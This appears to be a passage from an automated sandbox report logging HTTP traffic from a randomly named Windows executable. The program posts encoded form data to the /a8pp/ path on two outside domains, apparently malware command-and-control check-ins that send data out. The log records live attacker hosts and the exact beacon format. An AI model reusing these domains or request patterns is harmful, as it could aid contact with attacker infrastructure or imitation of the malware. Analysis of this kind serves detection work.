                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 55 37 44 4b 78 62 73 55 37 38 73 55 67 66 2b 72 42 64 65 52 53 6d 52 37 62 41 64 39 49 46 47 48 68 70 42 49 61 7a 43 53 50 42 41 4e 54 2f 45 4d 71 4f 77 2f 4a 44 2f 4f 6d 32 65 56 50 30 2b 74 71 63 67 43 62 4e 61 7a 6a 33 50 4c 47 66 63 35 34 35 67 4e 38 2b 57 5a 55 77 58 56 68 69 78 38 4a 7a 35 7a 33 36 66 43 52 31 32 43 5a 62 67 37 42 53 33 37 72 62 69 49 41 31 48 4f 67 6b 65 36 2b 2b 67 78 59 4a 5a 4b 32 74 4a 50 5a 72 43 4b 71 6f 56 52 61 4d 4f 6b 64 51 52 33 6a 53 39 4a 4b 72 59 65 79 62 6d 49 44 6e 31 34 65 65 30 4f 55 6d 50 34 48 67 3d 3d
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHU7DKxbsU78sUgf+rBdeRSmR7bAd9IFGHhpBIazCSPBANT/EMqOw/JD/Om2eVP0+tqcgCbNazj3PLGfc545gN8+WZUwXVhix8Jz5z36fCR12CZbg7BS37rbiIA1HOgke6++gxYJZK2tJPZrCKqoVRaMOkdQR3jS9JKrYeybmIDn14ee0OUmP4Hg==
                                        Jun 4, 2024 14:34:46.790998936 CEST462INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:46 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.11.304979634.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:34:49.297286034 CEST777OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 56 66 2f 4b 30 37 51 55 73 73 73 4c 6c 66 2b 72 50 39 65 56 53 68 5a 37 62 42 59 32 49 77 32 48 6d 4c 70 49 5a 79 43 53 4b 42 41 4e 62 66 45 4a 33 65 77 30 4a 43 43 37 6d 33 79 56 50 30 36 74 71 5a 45 43 62 36 32 79 69 6e 50 4e 4f 2f 63 37 32 5a 67 4e 38 2b 57 5a 55 77 44 37 68 69 35 38 4a 43 4a 7a 32 66 2f 4e 53 31 32 42 61 62 67 37 54 69 33 33 72 62 69 75 41 78 47 62 67 6d 57 36 2b 2f 51 78 62 59 5a 46 6c 4e 4a 4a 55 4c 43 5a 36 35 6b 63 64 64 4b 50 57 67 39 45 70 78 5a 67 43 63 70 45 76 59 53 4b 51 48 4a 56 43 66 5a 6d 57 6b 4f 6a 61 71 4b 4c 6e 58 58 65 4a 78 78 49 56 44 62 69 37 31 61 30 37 57 41 3d
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHVf/K07QUsssLlf+rP9eVShZ7bBY2Iw2HmLpIZyCSKBANbfEJ3ew0JCC7m3yVP06tqZECb62yinPNO/c72ZgN8+WZUwD7hi58JCJz2f/NS12Babg7Ti33rbiuAxGbgmW6+/QxbYZFlNJJULCZ65kcddKPWg9EpxZgCcpEvYSKQHJVCfZmWkOjaqKLnXXeJxxIVDbi71a07WA=
                                        Jun 4, 2024 14:34:49.445028067 CEST462INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:49 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.11.304979734.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:34:51.937674999 CEST1694OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Origin: http://www.blissfulbooks.online
                                        Referer: http://www.blissfulbooks.online/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 6d 32 31 49 44 42 52 54 43 38 61 48 56 66 2f 4b 30 37 51 55 73 73 73 4c 6c 66 2b 72 50 39 65 56 53 68 5a 37 62 42 59 32 49 77 2b 48 6d 34 52 49 5a 52 36 53 4e 42 41 4e 61 66 45 49 33 65 77 6c 4a 43 61 33 6d 33 75 76 50 33 53 74 34 72 4d 43 64 49 4f 79 74 6e 50 4e 43 66 63 36 34 35 68 46 38 2b 47 47 55 77 54 37 68 69 35 38 4a 42 52 7a 78 4b 66 4e 65 56 32 43 5a 62 67 33 42 53 32 69 72 62 36 51 41 78 4c 67 6e 53 61 36 2b 66 41 78 4c 36 42 46 2f 4e 4a 4c 58 4c 44 45 36 35 70 63 64 64 47 44 57 67 59 70 70 77 74 67 42 34 6b 75 72 5a 57 57 43 6d 6c 58 4c 66 49 63 59 6c 32 58 51 4c 2b 71 6e 47 76 62 66 7a 5a 6b 57 6b 37 6b 67 32 53 33 74 47 72 46 56 78 58 35 65 56 6d 39 42 43 39 4a 36 36 37 66 7a 6c 4f 43 78 69 70 64 38 59 78 68 44 42 4d 79 71 48 41 77 5a 59 57 47 64 43 51 36 54 61 55 49 4d 35 57 45 34 64 61 77 2b 32 32 67 31 69 68 42 52 2b 4c 53 68 53 4f 54 6a 63 2b 65 67 4a 51 44 61 54 4b 49 2b 43 37 65 61 74 6a 32 32 2b 36 49 7a 4c 36 69 33 72 57 67 79 46 4d 54 6b 47 75 48 75 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=m21IDBRTC8aHVf/K07QUsssLlf+rP9eVShZ7bBY2Iw+Hm4RIZR6SNBANafEI3ewlJCa3m3uvP3St4rMCdIOytnPNCfc645hF8+GGUwT7hi58JBRzxKfNeV2CZbg3BS2irb6QAxLgnSa6+fAxL6BF/NJLXLDE65pcddGDWgYppwtgB4kurZWWCmlXLfIcYl2XQL+qnGvbfzZkWk7kg2S3tGrFVxX5eVm9BC9J667fzlOCxipd8YxhDBMyqHAwZYWGdCQ6TaUIM5WE4daw+22g1ihBR+LShSOTjc+egJQDaTKI+C7eatj22+6IzL6i3rWgyFMTkGuHu9Zuh8Qyp9RpKHQ7Tsg8GXdrlIjqo0rMlqD2vGaXkkQSYar8FOmVyHWE3816yVenmn1vlQGf8kPkNcT7GqWBfvb/Q9CIcfGXx/vzX3V3ce9sdoMY9eJ+0QkIKXz6ZXt51MAi/f6dKmQWjsoqxFa8x7HkCXf234r8mS1w7ccIT1547zkxWgG4nUcnYUQRCcUsl5ok2p/gFI62Zlj91jqWdJwEojljxSBMLFEDoqSQAQ9VixajbX125Ok72cHGofJ6BQMWtGVB3ai7006X/s03p5b4boE4fda8nH5/tqJhBqB9A7N/Tg963L10iFqVeHEOzKm+8UKgMJx2P6n41iEu+biNF+gA+dL1XJzQ/TNaC4kWVObE9OdER4AioJx0hZ1U3MRqlUgD1zGRHGnc7PUERrzn3LkdKe/jqtKhUjKLiqyNLSinsgimYuYeCO8RwAe3S7oZZcK0rcpCEdBDt99QgVI5ZuqRjJ0yl6VXG4LmdGDiiMmQhaeEs57VTTD4vL9naLZXIvvXX5hxiAxpxncg3r/JoFPnuolHonEYhGehhqFS0vBqhmCkrJ+Q0hyn4Mdr+N0jXXYiN8dpAriTfH3l24toCA5Rb5jbT9/7F5YgRu67kUott3Llp+mu8xC/wVS+CYrrg+vTeaWzPGhYZlku0ff8Sb+62UO57X8 [TRUNCATED]
                                        Jun 4, 2024 14:34:52.085994959 CEST462INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:52 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.11.304979834.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:34:54.577596903 CEST474OUTGET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:34:54.724420071 CEST606INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:34:54 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.11.3049799160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:01.591856003 CEST760OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4f 64 46 59 66 58 33 45 43 2b 76 33 51 6b 59 76 73 74 67 6f 7a 47 36 4f 32 58 63 33 35 63 47 77 70 2f 54 4b 53 66 4b 2b 45 64 37 73 53 55 73 55 57 78 78 4e 59 77 69 65 53 37 4d 77 37 61 67 51 72 76 71 6a 34 64 57 63 6d 72 77 4b 75 64 62 33 36 74 37 37 76 69 77 2f 51 6c 46 6f 75 42 78 32 52 4d 74 31 74 68 35 4a 6f 79 32 61 4a 59 31 45 43 6a 6b 38 62 2f 6e 4c 74 73 5a 45 63 32 54 79 6f 59 6f 6c 72 46 34 4d 47 6c 68 35 6a 32 4a 38 65 52 46 35 38 69 68 39 4c 42 62 32 63 52 38 44 36 7a 37 4a 43 6d 43 32 56 73 63 73 54 44 46 47 30 36 63 74 78 79 71 36 48 53 46 71 38 4c 78 79 4e 67 3d 3d
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3QkYvstgozG6O2Xc35cGwp/TKSfK+Ed7sSUsUWxxNYwieS7Mw7agQrvqj4dWcmrwKudb36t77viw/QlFouBx2RMt1th5Joy2aJY1ECjk8b/nLtsZEc2TyoYolrF4MGlh5j2J8eRF58ih9LBb2cR8D6z7JCmC2VscsTDFG06ctxyq6HSFq8LxyNg==
                                        Jun 4, 2024 14:35:01.903924942 CEST381INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:01 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip
                                        Data Raw: 61 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 35 ca 31 0e 82 30 14 80 e1 ab 34 9d a9 c4 bd e5 2e 4d 79 89 8f d0 42 e8 13 3c 93 83 c1 81 68 22 1d 8c 32 e8 c2 20 f1 0a 5e c2 41 23 71 fc bf fc 92 90 72 48 6e e3 65 98 fa e1 7a de 8e dd 21 dc 83 38 86 f0 ee 5e a7 f6 b9 0f 8f a9 6f 77 32 9e 47 69 81 34 73 da 82 e2 35 42 53 16 15 71 66 0a 47 e0 48 f1 06 53 5a a9 14 6a 34 20 7e 11 31 74 48 a8 73 e1 8d ce 41 2d 23 66 f5 06 ed da fe 81 27 d2 9b 0a 4b 62 be 32 8a c7 99 5f 64 fe 8b f1 ac c9 07 08 74 14 f7 a3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a55104.MyB<h"2 ^A#qrHnez!8^ow2Gi4s5BSqfGHSZj4 ~1tHsA-#f'Kb2_dt0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.11.3049800160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:04.424793005 CEST780OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4f 64 46 59 66 58 33 45 43 2b 76 33 52 46 6f 76 75 4f 34 6f 31 6d 36 4e 35 33 63 33 32 38 47 30 70 2f 66 4b 53 65 2b 75 44 6f 6a 73 4c 32 6b 55 58 31 74 4e 5a 77 69 65 47 72 4d 31 6a 36 67 50 72 76 6e 63 34 63 71 63 6d 72 30 4b 75 66 54 33 36 61 50 38 73 53 77 39 4c 56 46 6d 78 78 78 32 52 4d 74 31 74 68 74 76 6f 7a 65 61 49 72 74 45 51 58 77 2f 54 66 6e 45 37 38 5a 45 59 32 54 75 6f 59 70 32 72 45 6b 71 47 67 39 35 6a 33 35 38 66 45 70 2b 76 43 68 37 47 68 61 58 55 52 6f 50 2b 69 4b 2b 44 68 2b 44 56 64 55 72 53 55 30 63 70 35 6f 76 69 53 57 58 62 54 6f 43 2b 4a 77 70 51 6f 6a 73 68 78 49 5a 6a 50 4f 4c 49 73 55 7a 30 6c 69 37 65 42 67 3d
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3RFovuO4o1m6N53c328G0p/fKSe+uDojsL2kUX1tNZwieGrM1j6gPrvnc4cqcmr0KufT36aP8sSw9LVFmxxx2RMt1thtvozeaIrtEQXw/TfnE78ZEY2TuoYp2rEkqGg95j358fEp+vCh7GhaXURoP+iK+Dh+DVdUrSU0cp5oviSWXbToC+JwpQojshxIZjPOLIsUz0li7eBg=
                                        Jun 4, 2024 14:35:04.737843037 CEST381INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:04 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip
                                        Data Raw: 61 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 35 ca 31 0e 82 30 14 80 e1 ab 34 9d a9 c4 bd e5 2e 4d 79 89 8f d0 42 e8 13 3c 93 83 c1 81 68 22 1d 8c 32 e8 c2 20 f1 0a 5e c2 41 23 71 fc bf fc 92 90 72 48 6e e3 65 98 fa e1 7a de 8e dd 21 dc 83 38 86 f0 ee 5e a7 f6 b9 0f 8f a9 6f 77 32 9e 47 69 81 34 73 da 82 e2 35 42 53 16 15 71 66 0a 47 e0 48 f1 06 53 5a a9 14 6a 34 20 7e 11 31 74 48 a8 73 e1 8d ce 41 2d 23 66 f5 06 ed da fe 81 27 d2 9b 0a 4b 62 be 32 8a c7 99 5f 64 fe 8b f1 ac c9 07 08 74 14 f7 a3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a55104.MyB<h"2 ^A#qrHnez!8^ow2Gi4s5BSqfGHSZj4 ~1tHsA-#f'Kb2_dt0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.11.3049801160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:07.267520905 CEST1697OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4f 64 46 59 66 58 33 45 43 2b 76 33 52 46 6f 76 75 4f 34 6f 31 6d 36 4e 35 33 63 33 32 38 47 30 70 2f 66 4b 53 65 2b 75 44 72 44 73 4c 6a 77 55 57 55 74 4e 65 77 69 65 5a 62 4d 30 6a 36 67 47 72 76 50 59 34 63 6d 6d 6d 6f 63 4b 38 4d 4c 33 38 76 6a 38 33 43 77 39 55 6c 46 6e 75 42 77 69 52 4d 39 71 74 68 39 76 6f 7a 65 61 49 75 68 45 41 54 6b 2f 65 2f 6e 4c 74 73 5a 32 63 32 54 4b 6f 59 67 44 72 45 68 58 47 54 6c 35 6a 55 52 38 59 32 52 2b 73 69 68 35 56 52 61 31 55 52 31 52 2b 69 58 48 44 68 69 36 56 66 55 72 54 41 6c 77 38 49 6f 50 7a 6c 75 45 48 53 63 70 31 62 5a 37 64 61 54 30 6e 67 6b 43 70 63 48 68 52 5a 73 56 6f 33 4b 6e 4c 57 4d 59 79 43 74 37 68 43 63 33 41 34 52 65 6d 42 38 45 54 65 39 69 59 75 70 73 72 73 33 55 5a 74 66 41 69 45 34 67 65 6b 4c 72 59 4c 63 59 43 71 45 61 35 72 5a 42 63 52 6f 4a 44 46 6e 67 38 6d 6e 59 62 6c 76 7a 66 71 4f 42 76 51 69 6d 4a 6c 73 75 52 6d 73 30 6c 66 44 32 51 4e 37 32 2f 72 72 39 55 38 43 36 64 46 39 37 52 67 64 31 7a 58 72 44 77 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3RFovuO4o1m6N53c328G0p/fKSe+uDrDsLjwUWUtNewieZbM0j6gGrvPY4cmmmocK8ML38vj83Cw9UlFnuBwiRM9qth9vozeaIuhEATk/e/nLtsZ2c2TKoYgDrEhXGTl5jUR8Y2R+sih5VRa1UR1R+iXHDhi6VfUrTAlw8IoPzluEHScp1bZ7daT0ngkCpcHhRZsVo3KnLWMYyCt7hCc3A4RemB8ETe9iYupsrs3UZtfAiE4gekLrYLcYCqEa5rZBcRoJDFng8mnYblvzfqOBvQimJlsuRms0lfD2QN72/rr9U8C6dF97Rgd1zXrDwy+/nA0Bas4ntc6Vv5RZ9ZdS8YcOEXwWeEUtOkSzCEHsRvFPNCuTwkL8wWY5cPV+PJM00bRtftq7FK0LvzC7AtfLA7Kpvvukt5v8RJo+7zlQWb2CuS4WC/6Ha6CvY2QPMIC8DWo6wuqC7V2Ej8uYT39hMpD2Ug0dqPGMfeZfmBh8IZf/K64pbfoWPJlwrRfBFkC0iuETc0UoHPPVMuK119IiYmshY0ff278kc900Nbp0hrn814aadg2HGA+uR2T+MM5iyhkicBzxIiV2EVBrCTDo6f+BvtdSVSoLMBXFpPm5zOVKEiN+1mgf5mKsu8xMmkS3+0HuzLc7TOt/0IU2r3eGi91qAEx9gRHzPxUaQyBl5sGq96kCGPaL/eAS/OD6dqylWQtPyzsnIPKPHDBpmhlCjJ1e63HazuvRadHk0epcalcqwRhlDIFljsySIA3GPb6D/Nf1lHA3aICgSpdqAbfwHhC0X/zD1MnujpIhQ9BJQC7wn2VFFQVFkNzqfZGxgO9d246d810LfZLEANF59SRNCmDk3OYl+R92vTHCYVXgt44L4nuIPIFUsD070OeEc36tTBfGshPkxN9MFV0PvDvgu8mvwBnhTHchiuxBu1yFBkq909oqtosldufPFlFK7EnS25x/Q/mm5gfBtzVCsATkRTvR4yd2Vla [TRUNCATED]
                                        Jun 4, 2024 14:35:07.580271006 CEST381INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:35:07 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip
                                        Data Raw: 61 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 35 ca 31 0e 82 30 14 80 e1 ab 34 9d a9 c4 bd e5 2e 4d 79 89 8f d0 42 e8 13 3c 93 83 c1 81 68 22 1d 8c 32 e8 c2 20 f1 0a 5e c2 41 23 71 fc bf fc 92 90 72 48 6e e3 65 98 fa e1 7a de 8e dd 21 dc 83 38 86 f0 ee 5e a7 f6 b9 0f 8f a9 6f 77 32 9e 47 69 81 34 73 da 82 e2 35 42 53 16 15 71 66 0a 47 e0 48 f1 06 53 5a a9 14 6a 34 20 7e 11 31 74 48 a8 73 e1 8d ce 41 2d 23 66 f5 06 ed da fe 81 27 d2 9b 0a 4b 62 be 32 8a c7 99 5f 64 fe 8b f1 ac c9 07 08 74 14 f7 a3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a55104.MyB<h"2 ^A#qrHnez!8^ow2Gi4s5BSqfGHSZj4 ~1tHsA-#f'Kb2_dt0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.11.3049802160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:35:10.111073017 CEST475OUTGET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1
